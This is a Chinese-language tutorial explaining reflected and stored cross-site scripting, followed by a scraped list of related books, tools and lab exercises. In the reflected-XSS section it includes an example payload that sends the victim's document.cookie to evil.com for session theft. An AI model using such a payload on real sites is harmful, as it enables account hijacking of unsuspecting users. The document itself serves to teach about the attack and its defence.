XSS 是一种很常见的攻击手段,在该攻击中攻击者将一个恶意代码段注入到一个运行良好的站点中。XSS 攻击有如下两种基本的类型:
- Reflected XSS
- Stored XSS
Reflected XSS
Reflected XSS 攻击的前提条件是某Web应用程序会把用户输入的信息不加检查和限制地返回给用户。一个常见的例子就是,用户登录时,输入用户名和密码,比如用户Joe登 录,密码错误了,网站会显示Sorry, Joe, Your password is incorrect。网站把用户名直接返回给用户, 如果用户输入了Javascript代码,会直接返回给用户,并造成Javascript代码执行。reflected XSS利用了 Web 应用程序安全性低的弱点,该应用程序在浏览器中显示输入参数而不对其中是否存在活动内容进行检查。通常,攻击者会诱使受害者单击 URL。
document.images[0].src="http://evil.com/steal?cookie="
+ document.cookie; </script>
假设 trusted.com 提供了一个服务,该服务具有一个搜索特性能把搜索结果和输入的关键字一起提交回来。如果搜索应用程序没有过滤 URL 中的一些特殊字符(如小于号 (<) 和大于号 (>)),则 <script> 标记也将被插入到用户 Web 页面中,这样将会把文档的 cookie 发送给远程服务器 evil.com。攻击者一旦有了cookie就可以以用户的身份登录网站。
Reflected XSS Demo: http://www.youtube.com/watch?v=V79Dp7i4LRM
Stored XSS
随着 Web 2.0 的普及 stored XSS 攻击越来越严重。Web 2.0 成功的关键是大众之间的共享、交互和协作,因此用户有更多的机会可以通过一些服务(比如说社会网络服务(social network services,SNS)、wiki 或 blog)看到其他用户(具有潜在恶意性)的输入。
不管怎样,输入值验证和数据消毒(sanitation)是防止 XSS 攻击的关键因素。通常,Web 服务器从用户输入中移除脚本,但是攻击者经常会利用服务器的弱点绕过这些过滤器,从而造成一些重大的攻击,比如说 Yamanner 或 MySpaceIn 蠕虫。
Stored XSS Demo: http://www.youtube.com/watch?v=7M-R6U2i5iI
相关推荐
Complete Cross-site Scripting Walkthrough
英文版 10 Quick Facts About XSS Viruses and Worms" 5 An Overview of Cross-Site Scripting (XSS)" 6 Non-Persistent" 6 Persistent" 9 How They Do It: Methods of Propagation" 10
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
4/159 Syngress - Xss Attacks - Cross Site Scripting Exploits And Defense
Cross Site Scripting
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。
一篇关于XSS攻击的论文,是研究新型CC攻击/XSS攻击有启发性的文章,发表于08年前后
Cross-Site Scripting(XSS)绕过技术,来自论坛:法克论坛,作者:bystand
跨站脚本攻击(Cross-Site Scripting,XSS)是一种常见的网络安全漏洞,攻击者通过注入恶意脚本代码到网页中,然后使用户在浏览器中执行这些恶意脚本,从而窃取用户的信息、会话令牌或者执行其他恶意操作。...
书才400多页,插了很多图片很多代码,实例很多,看起来不错。 我花了一些时间把书签给补上了,大家就意思意思一下给我点分吧:)
https://gbhackers.com/a3-cross-site-scripting-xss/ 跨站点“Scripter”(又名Xsser)是一个自动框架,用于检测、利用和报告基于Web的应用程序中的XSS漏洞。 它包含几个可以绕过某些过滤器的选项,以及各种特殊的...
像其它网络攻击一样,如SQL injection,很多对跨站脚本(cross-site scripting, XSS)的指责都指向引起可能性的不安全应用。动态产生页面的网络服务器应用如果不能确认用户输入并确保产生的页面都正确编码了,他们会...
Finding and Exploiting Cross-Site Scripting (XSS) Vulnerabilities Exploiting Cross Site Request Forgery Attacking Cryptographic implementation flaws AJAX, HTML5 and client side attacks Fuzzing Web ...
目前较好的一本介绍跨站脚本攻击(XSS)的书 <br>Cross Site Scripting Attacks starts by defining the terms and laying out the ground work. It assumes that the reader is familiar with basic web ...
There are several work is going on in the direction of securing Cross-Site Scripting ... CrossSite Scripting (XSS) is one of the major attack types in the communication process through java server pages.
It’s about Cross-Site Scripting (XSS), the most widespread and common flaw found in the World Wide Web. You must be familiar with (at least) basic concepts of this flaw to enjoy this book. For that ...
利用Kali Linux对DVWA的Reflected Cross Site Scripting (XSS)/Stored Cross Site Scripting (XSS)模块,包括: 1) Low等级;(15分) 2) Medium等级;(10分) 3) High级别;(10分) 4) Impossible等级的机制以及...
java配置xssproject,文件包括配置步骤,需要的jar包,完整的xssproject类,并且提供的类解决了multipart/form-data类型的Request请求xss过滤问题
简单XSS测试脚本 一、实验目的 了解XSS的有关知识;...2.1、点击“Cross-Site Scripting”然后点击反射型XSS(get),打开反射型XSS的测试站点。 2.1.1、看见页面提示“Which NBA player do you lik
邮猪 在Ubuntu系统中设置 (最新版本)。 要求 没有 变数 mailhog_version [默认: v1.0.0 ]:要安装的版本 mailhog_install_prefix [默认: /usr/local/bin ]:安装前缀 mailhog_user [默认: mailhog ]:将运行...